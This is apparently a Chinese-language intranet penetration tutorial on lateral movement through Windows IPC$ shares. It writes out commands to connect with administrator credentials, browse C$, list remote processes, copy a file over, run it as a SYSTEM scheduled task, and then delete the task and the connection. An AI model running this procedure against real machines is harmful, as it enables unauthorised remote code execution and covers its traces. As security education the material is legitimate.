内网渗透 -IPC$ 横向控制 OA 系统【网络安全】

IPC$介绍

IPC(Internet ProcessConnection)共享“命名管道”的资源，是为了实现进程间通信而开放的命名管道。IPC 可以通过验证用户名和密码获得相应的权限，通常在远程管理计算机和查看计算机的共享资源时使用。通过 ipc$，可以与目标机器建立连接。

利用这个连接，不仅可以访问目标机器中的文件,进行上传、下载等操作，还可以在目标机器上运行其他命令，以获取目标机器的目录结构、用户列表等信息。

配套教程：内网渗透-IPC$横向控制OA系统

首先，需要建立一个 ipc$

net use \\192.168.18.10\ipc$"密码" /user:administrator

net use

IPC$利用条件

1、开启了 139、445 端口 ipcs 可以实现远程登录及对默认共享资源的访问，而 139 端口的开启表示 NetBIOS 协议的应用。通过 139、445(Windows2000)端口，可以实现对共享文件打印机的访问。因此，一般来讲，ipcs 需要 139、445 端口的支持。2、管理员开启了默认共享默认共享是为了方便管理员进行远程管理而默认开启 的，包括所有的逻辑盘(c$、d$、e$等和系统目录winnt或windows(adminS)通过ipc$，可以实现对这些默认共享目录的访问。

IPC$连接失败原因

①用户名或密码错误②目标没有打开 ipcs 默认共享③不能成功连接目标的 139、445 端口

IPC$连接常见错误

利用方式-windows 自带命令

dir 命令

在使用 netuse 命令与远程目标机器建立 ipcs 后，可以使用 dir 命令列出远程主机中的文件，如图

dir  \\192.168.18.10\c$

tasklist 命令

在使用 net use 命令与远程目标机器建立 ipcs 后，可以使用 tasklist 命令的/S、/U/P 参数列出远程主机上运行的进程

tasklist  /s192.168.18.10

利用方式-schtasks

（1）查看系统时间

net  time  \\IP地址

（2）复制文件

copy   文件  \\IP地址\C$

（3）创建计划任务

schtasks  /create /s  IP地址  /tn  计划任务名  /sc onstart /tr c:\文件/ru system  /f

（4）执行计划任务

schtasks  /run  /s IP地址 /i /tn "计划任务名"

（5）删除计划任务

schtasks  /delete  /s  IP地址  /tn "计划任务名"  /f

（6）清除 IPC 连接

net use \\IP /del /y

总结

单看文字教程可能大部分小伙伴一脸懵，特奉上视频教程配套教程：内网渗透-IPC$横向控制OA系统